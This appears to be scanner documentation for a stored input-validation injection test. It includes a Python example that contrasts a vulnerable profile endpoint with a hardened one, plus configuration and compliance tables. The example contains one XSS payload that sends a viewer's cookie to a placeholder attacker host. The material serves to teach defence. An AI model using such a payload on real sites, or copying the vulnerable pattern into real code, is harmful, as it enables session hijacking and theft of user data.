Security Test: Stored Improper Input Validation Injection
Description
Default Severity:
This vulnerability occurs when an application does not validate or sanitize user input on the server before persisting it to a database or other store. An attacker submits a payload (for example, HTML or script markup in a profile field, comment or ticket body) that is saved as-is and later interpreted or executed when another user, or an administrative back-office, retrieves and renders that data. Because the payload fires later and in a different user's context, it can be used to steal sensitive information, hijack sessions or act on the victim's behalf, and it keeps firing until the stored record is cleaned up. The root cause is usually missing or incomplete server-side validation, or reliance on client-side checks alone, which an attacker bypasses simply by calling the API directly. Validation on write should be paired with context-appropriate output encoding on read, since stored data may later reach a sink (HTML, JSON, SQL, a shell command) that the original validation did not anticipate. Left unaddressed, this issue exposes user data, undermines trust and opens the door to more severe attacks against your application.
Reference:
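The pattern described above, as an added illustration that is not part of this page or of the scanner's own code: a vulnerable profile endpoint that trusts the client, stores the raw value and concatenates it into HTML for other viewers, beside a hardened version that enforces a server-side allowlist on write and HTML-encodes on read. The in-memory store, the `DISPLAY_NAME_RE` allowlist, the user names and the payload are all constructed for the example.

```python
import html
import re
from dataclasses import dataclass, field


# Constructed in-memory "database" standing in for the persistence layer.
@dataclass
class ProfileStore:
    rows: dict = field(default_factory=dict)


# --- Vulnerable path: client-side checks only, raw storage, raw rendering ---

def vulnerable_save(store: ProfileStore, user_id: str, display_name: str) -> None:
    # The web form "validated" the name in the browser; the API itself checks nothing,
    # so anyone calling the endpoint directly can store arbitrary markup.
    store.rows[user_id] = display_name


def vulnerable_render(store: ProfileStore, user_id: str) -> str:
    # Stored value is concatenated straight into the HTML another user will view,
    # so a payload saved earlier executes in every viewer's browser.
    return f"<p>Profile of {store.rows[user_id]}</p>"


# --- Hardened path: server-side allowlist on write, output encoding on read ---

# Hypothetical allowlist for a display name: word characters, space, dot, apostrophe,
# hyphen, 1 to 64 characters. Allowlists are preferable to denylisting "<script>".
DISPLAY_NAME_RE = re.compile(r"^[\w .'-]{1,64}$")


class ValidationError(ValueError):
    pass


def hardened_save(store: ProfileStore, user_id: str, display_name: str) -> None:
    if not DISPLAY_NAME_RE.fullmatch(display_name):
        raise ValidationError("display_name has disallowed characters or length")
    store.rows[user_id] = display_name


def hardened_render(store: ProfileStore, user_id: str) -> str:
    # Encode for the HTML context at output time even though the value was validated:
    # rows written before validation existed, or by another code path, are still safe.
    return f"<p>Profile of {html.escape(store.rows[user_id], quote=True)}</p>"


# Constructed stored-injection payload (exfiltrates the viewer's cookie).
PAYLOAD = "<script>fetch('https://attacker.example/?c='+document.cookie)</script>"


def demo() -> dict:
    """Run both paths against the same payload and return what each produced."""
    vuln = ProfileStore()
    vulnerable_save(vuln, "alice", PAYLOAD)          # accepted without complaint
    unsafe_html = vulnerable_render(vuln, "alice")   # script reaches every viewer

    safe = ProfileStore()
    try:
        hardened_save(safe, "alice", PAYLOAD)
        rejected = False
    except ValidationError:
        rejected = True                              # rejected at write time
    hardened_save(safe, "bob", "O'Brien")            # legitimate value passes
    safe_html = hardened_render(safe, "bob")

    # Simulate a legacy row that bypassed validation: encoding still neutralises it.
    safe.rows["legacy"] = PAYLOAD
    legacy_html = hardened_render(safe, "legacy")

    return {
        "unsafe_html": unsafe_html,
        "rejected": rejected,
        "safe_html": safe_html,
        "legacy_html": legacy_html,
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The two defences are deliberately independent: the allowlist stops the payload from ever being stored, and the encoding makes the renderer safe even for data that arrived some other way, which is the situation a stored-injection finding usually reflects.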
Configuration
Identifier:
injection/improper_input_stored
Examples
All configuration available:

```yaml
checks:
  injection/improper_input_stored:
    skip: false # default
    options:
      skip_objects: # cf. Options below
```
Options
Options can be set in the options key of the Security Test Configuration.
Property | Type | Default | Description |
---|---|---|---|
skip_objects | List[string] | | List of objects to be skipped by the security test. |
Compliance and Standards
Standard | Value |
---|---|
OWASP API Top 10 | API10:2023 |
OWASP LLM Top 10 | LLM02:2023 |
PCI DSS | 6.5.7 |
GDPR | Article-32 |
SOC2 | CC1 |
PSD2 | Article-95 |
ISO 27001 | A.14.2 |
NIST | SP800-53 |
FedRAMP | AC-4 |
CWE | 116 |
CVSS Vector | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:H/RL:O/RC:C |
CVSS Score | 7.2 |